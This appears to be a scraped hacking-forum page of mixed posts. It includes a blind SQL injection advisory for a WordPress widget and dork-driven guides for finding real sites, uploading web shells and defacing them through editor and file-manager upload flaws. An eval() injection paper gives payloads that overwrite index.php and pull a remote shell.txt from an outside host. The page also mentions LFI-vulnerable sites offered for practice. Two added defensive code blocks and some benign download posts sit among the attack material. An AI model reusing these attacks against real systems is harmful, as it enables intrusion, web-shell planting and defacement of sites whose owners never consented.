[Software] Tool Scan XSS
http://www.mediafire.com/?crdx77ueotbh8u1
Download password: vhb
WordPress MoodThingy Widget v0.8.7 Blind SQL Injection
# Exploit Title: WordPress MoodThingy Mood Rating Widget v0.8.7 Blind SQL Injection
# Date: 7/2/12
# Exploit Author: Chris Kellum
# Vendor Homepage: http://www.moodthingy.com/
# Software Link: http://downloads.wordpress.org/plugi...dget.0.8.7.zip
# Version: 0.8.7
=====================
Vulnerability Details
=====================
Input data from the form submission is not properly sanitized.
Using blind SQL injection techniques, true statements will result in the rating being updated, while false statements will cause the plugin to hang.
=================
Injection Example
=================
Using Burp Suite or another proxy, intercept the POST request when submitting the form and append " and 1=1" to the postID parameter before forwarding.
True statement example:
action=cast_vote&token=d9ad983425&moodthingyvote=6 &postID=6 and 1=1&results_div_id=voteresults
In the example above, the request will process successfully and the rating will be updated accordingly.
By replacing 1=1 with 1=0, the plugin will hang and the process will never complete successfully, giving you the true/false conditions needed for blind SQL injection.
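An added example, not code from the plugin or the advisory: it assumes the postID value reaches an UPDATE statement by string concatenation, and shows integer validation plus a bound parameter as the fix. The table, column and function names are hypothetical, and an in-memory SQLite database stands in for the WordPress database.

```php
<?php
// Added example: table, column and function names are hypothetical,
// not taken from the MoodThingy plugin source.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE votes (post_id INTEGER PRIMARY KEY, total INTEGER)');
$db->exec('INSERT INTO votes VALUES (6, 0)');

// Vulnerable pattern: the raw parameter becomes part of the SQL text,
// so "6 and 1=0" rewrites the WHERE clause instead of naming a post.
function cast_vote_unsafe(PDO $db, string $postID): int
{
    return $db->exec("UPDATE votes SET total = total + 1 WHERE post_id = $postID");
}

// Hardened pattern: accept only a positive integer, then bind it so the
// value can never be parsed as SQL.
function cast_vote_safe(PDO $db, string $postID): int
{
    $id = filter_var($postID, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('postID must be a positive integer');
    }
    $stmt = $db->prepare('UPDATE votes SET total = total + 1 WHERE post_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Constructed inputs matching the true and false cases in the advisory.
// In this sketch a false condition updates zero rows rather than hanging.
foreach (['6', '6 and 1=1', '6 and 1=0'] as $raw) {
    printf("unsafe %-12s rows=%d\n", "'$raw'", cast_vote_unsafe($db, $raw));
    try {
        printf("safe   %-12s rows=%d\n", "'$raw'", cast_vote_safe($db, $raw));
    } catch (InvalidArgumentException $e) {
        printf("safe   %-12s rejected: %s\n", "'$raw'", $e->getMessage());
    }
}
```

The unsafe function reports a different row count for the two injected conditions, which is the true/false signal the advisory relies on; the safe function rejects both before any SQL runs.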
HTML Editor File Upload Exploit
This is an exploit that can be used to upload .JPG and .TXT files to the website.
Dork: inurl:/HTMLEditor/editor/
"inurl:/HTMLEditor/editor//filemanager/"
"inurl:/HTMLEditor/editor//filemanager//connectors/"
Use any one of the above-mentioned dorks.
Vulnerable URL: http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html
Now, under 'Select the "File Uploader" to use', change the type to PHP.
Choose your file.
Click on "Send it to the Server" to upload your file.
If it uploaded successfully, you will get a message saying "File uploaded without any error".
After the upload completes, look at the Uploaded File URL on the right-hand side. From there you can view your uploaded file :D
"File Manager" Remote Shell and Deface Upload Vulnerability.
The following vulnerability allows remotely uploading a shell or deface page to a vulnerable website.
Google Dorks:
inurl:/filemanager/userfiles/ filetype:pdf
inurl:/filemanager/index.html
Vulnerable URL:
http://www.site.com/filemanager/index.html
Now, google the dork and select any website from the search results.
When you select any website, the URL will be as
Now delete the text after filemanager. After deleting the text, the URL will be
http://www.site.com/filemanager/
You will get an upload option; upload your shell or deface there.
Your file will be uploaded to the UserFiles directory.
To view your shell visit the below mentioned URLs:
http://www.site.com/UserFiles/Shell.php
http://www.site.com/UserFiles/deface.html
or
http://www.site.com/UserFiles/directory/Shell.php
http://www.site.com/UserFiles/directory/deface.html
Eval() Vulnerability & Exploitation
File: Eval() Vulnerability & Exploitation
Author: GlaDiaT0R
Hits: 859
date: 2010-05-04
##############################################################################
# [+] Title: [Eval() Vulnerability & Exploitation]
##############################################################################
# [+] About:
##############################################################################
# Written by: GlaDiaT0R
# Contact: the_gl4di4t0r[AT]hotmail[DOT]com or berrahal.ryadh[AT]gmail[DOT]com
# Team: Tunisian Power Team ( DarkGh0st.Net )
##############################################################################
# [+] Summary:
# [1]-Introduction
# [2]-Detection
# [3]-Vulnerable Source code
# [4]-Exploiting..
##############################################################################

[1]-Introduction

eval() is a PHP function that interprets a given string as PHP code. eval() is often used in web applications, most of the time to execute PHP code containing a previously defined variable. The problem is that if eval() executes a variable that you can modify, the PHP code it contains will be executed as such.

Reminder: eval() executes a given string as PHP code but does not write its content into this page or others (unless so desired); it only executes it and displays the result.

We will see different PHP source codes using eval(), the possibilities of PHP code injection, and how the way eval() is used can change the syntax of the PHP code to execute.

=======================================================

[2]-Detection

PoC 1 :
http://www.vulnsite.com/evalinject.php?ev=<? phpinfo(); ?>
[ eval() executes the contents of the variable "ev" as PHP code ]
----------
PoC 2 :
http://www.vulnsite.com/evalinject.php?ev=phpinfo();
[ eval() executes the contents of the variable "ev" as PHP code (without tags) ]
----------
PoC 3 :
Change the header or POST variable cited to: phpinfo() [or <? phpinfo(); ?>, depending on the PHP code used] (with Tamper Data)
[ eval() executes a string taken from the $HTTP_USER_AGENT variable, so just change your header to PHP code ]

=======================================================

[3]-Vulnerable Source code

PoC 1 :
<?php
$Ev = $_GET['ev'];
$string = ($Ev);
$string = preg_replace_callback("/(<\?=)(.*?)\?>/si",create_function('$string','ob_start();eval("$string[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$string);
$string= preg_replace_callback("/(<\?php|<\?)(.*?)\?>/si",create_function('$string','ob_start();eval("print $string[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$string);
echo $string;
?>
----------
PoC 2 :
<?php
$Ev = $_GET['ev'];
$eva = stripslashes($Ev);
eval($eva);
?>
----------
PoC 3 :
<?php
$string = stripslashes($HTTP_USER_AGENT);
$string = preg_replace_callback("/(<\?=)(.*?)\?>/si",create_function('$string','ob_start();eval("$string[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$string);
$string= preg_replace_callback("/(<\?php|<\?)(.*?)\?>/si",create_function('$string','ob_start();eval("print $string[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$string);
echo $string;
?>

=======================================================

[4]-Exploiting..
----------
Write or create a page containing: Hacked by ...
<?php $z=fopen("index.php",'w');fwrite($z,("HACKED BY GlaDiaT0R"));fclose($z); ?>
or
$z=fopen("index.php",'w');fwrite($z,("HACKED BY GlaDiaT0R"));fclose($z);
----------
To insert a remote page include using a URL
<?php include('http://www.website.com/shell.txt'); ?>
or
include('http://www.website.com/shell.txt');
----------
Insertion of remote code into the vulnerable website
<?php $z=fopen("shell.php",'w');fwrite($z,file_get_contents("http://www.website.com/shell.txt"));fclose($z); ?>
or
$z=fopen("shell.php",'w');fwrite($z,file_get_contents("http://www.website.com/shell.txt"));fclose($z);
----------
Thank you for your attention.
I hope you understood the process to exploit the eval() vulnerability.
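A hardened counterpart to PoC 1 and PoC 3 above, added here and not part of the original paper: the same tag-substitution idea implemented without eval(), so request data is only ever treated as text. The function name, the allowlisted variable names and the sample inputs are hypothetical.

```php
<?php
/* Added example: function and variable names are hypothetical. */

/*
 * Renders untrusted text that may contain short echo tags. The whole
 * input is HTML-escaped first, so any PHP tag becomes inert text. Only
 * tags that name an allowlisted variable are then replaced by that
 * variable's escaped value. No part of the input is passed to eval().
 */
function render_untrusted(string $input, array $allowed): string
{
    $escaped = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');
    $result = preg_replace_callback(
        '/&lt;\?=\s*\$([A-Za-z_][A-Za-z0-9_]*)\s*;?\s*\?&gt;/',
        function (array $m) use ($allowed): string {
            if (!array_key_exists($m[1], $allowed)) {
                return $m[0]; /* unknown name: keep the escaped tag as text */
            }
            return htmlspecialchars((string) $allowed[$m[1]], ENT_QUOTES, 'UTF-8');
        },
        $escaped
    );
    return $result ?? $escaped; /* regex engine error: fall back to escaped text */
}

/* Constructed inputs: one legitimate template and the page's phpinfo() probes. */
$allowed = ['user' => 'alice', 'agent' => 'Mozilla/5.0 <test>'];
$samples = [
    'Hello <?= $user ?>, your browser is <?= $agent ?>',
    '<? phpinfo(); ?>',
    '<?= phpinfo() ?>',
    '<?= $secret ?>',
];
foreach ($samples as $s) {
    echo render_untrusted($s, $allowed), "\n";
}
```

Only the first sample produces substituted output; the other three come back as escaped text because nothing in them names an allowlisted variable.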
[Ebook] Collection of talks presented at TetCon 2012
1. Finding software bugs with smart fuzzing techniques - Phạm Văn Toàn
http://www.mediafire.com/?k2z717z9m2trld8
2. Lesser-known vulnerabilities and how to defend against them - Dương Ngọc Thái
http://www.mediafire.com/?pimdtbwl4natj02
3. Shopping without paying: vulnerabilities in online payment systems in Vietnam - Nhâm Xuân Nam
http://www.mediafire.com/?725js96xcbdrw2s
4. Attacking the sandbox and using AV as a shield to protect malware - Nguyễn Phố Sơn
http://www.mediafire.com/?96hygetazz2dadn
5. The BEAST attack - Juliano Rizzo
http://www.mediafire.com/?y527u8va0x67v5m
6. Two techniques for optimizing Blind SQL Injection attacks - Nguyễn Hoàng Thịnh
http://www.mediafire.com/?jri611fdfude74r
Giant video book on programming and computing
This video book collection covers a fairly complete set of courses on computing and programming.
The link contains courses on PHP, C, SQL... and many, many more; open the link and you will see. The courses are delivered as video, so they are easier to follow and more visual than reading an ebook.
Sharing this with everyone, especially those who are just starting to learn to code.
Download link:
http://www.mediafire.com/?t1ze73nafc37q
Auto Clicker 3.0 [No Virus]
Free Mouse Auto Clicker 3.0 is software that automatically clicks (auto click) at any spot on the screen so you do not have to sit and click the mouse yourself.
How to use:
After launching the program:
1. Set the interval between clicks under Click Interval.
2. Click Options is where you set whether it auto-clicks the left or right mouse button, and whether it single-clicks or double-clicks.
3. Under Click Hotkey you can set the hotkey that starts auto-clicking and the hotkey that stops it.
4. Press Start to begin, or use the hotkey set under Click Hotkey.
5. After starting, move the mouse to any position on the screen and it will click continuously at that position (the interval between two clicks depends on what you set under "Click Interval").
6. When you no longer want to auto-click, click the Stop button or press the hotkey set under Click Hotkey.
Download:
http://sinhvienit.net/@forum/attachm...ickerSetup.rar
Virus scan results from virustotal.com

Property | Value |
---|---|
SHA256 | 1563c8d90c3fc85b6b741d51df74caf94f1783028e35005294fe17a95fd99eac |
SHA1 | 09036ddbd6a90cc872e06eb4b56336de81c000bb |
MD5 | 2aded45593b0d1377474808a129b6032 |
File size | 458.0 KB ( 468946 bytes ) |
File name | FreeMouseAutoClickerSetup.exe |
File type | Win32 EXE |
Tags | peexe |
Detection ratio | 0 / 37 |

Antivirus | Result | Update |
---|---|---|
AhnLab-V3 | - | 20120922 |
AntiVir | - | 20120922 |
Antiy-AVL | - | 20120911 |
Avast | - | 20120922 |
AVG | - | 20120922 |
BitDefender | - | 20120922 |
ByteHero | - | 20120922 |
CAT-QuickHeal | - | 20120922 |
ClamAV | - | 20120922 |
Commtouch | - | 20120922 |
Comodo | - | 20120922 |
DrWeb | - | 20120922 |
Emsisoft | - | 20120919 |
ESET-NOD32 | - | 20120922 |
F-Prot | - | 20120922 |
Fortinet | - | 20120922 |
GData | - | 20120922 |
Ikarus | - | 20120922 |
Jiangmin | - | 20120922 |
K7AntiVirus | - | 20120921 |
Kaspersky | - | 20120922 |
McAfee | - | 20120922 |
McAfee-GW-Edition | - | 20120922 |
Microsoft | - | 20120922 |
Norman | - | 20120922 |
nProtect | - | 20120921 |
PCTools | - | 20120922 |
Sophos | - | 20120922 |
SUPERAntiSpyware | - | 20120911 |
Symantec | - | 20120922 |
TheHacker | - | 20120920 |
TotalDefense | - | 20120921 |
TrendMicro | - | 20120922 |
TrendMicro-HouseCall | - | 20120922 |
VBA32 | - | 20120921 |
VIPRE | - | 20120922 |
ViRobot | - | 20120922 |
List of sites affected by LFI for newbies to practice on :)
Source: HF
Video guide to installing SQL Server 2008
A guide to installing SQL Server 2008 for everyone.
The other day I saw a VHB member on the VHB shoutbox say they could not install SQL Server. Here is a video guide to installing it from A to Z for everyone.
SQL Server 2008 installation guide (a bit over 8 MB compressed).
Link: http://www.mediafire.com/?ypq2pnapdr75fu2
pass: vhb
Source: VHB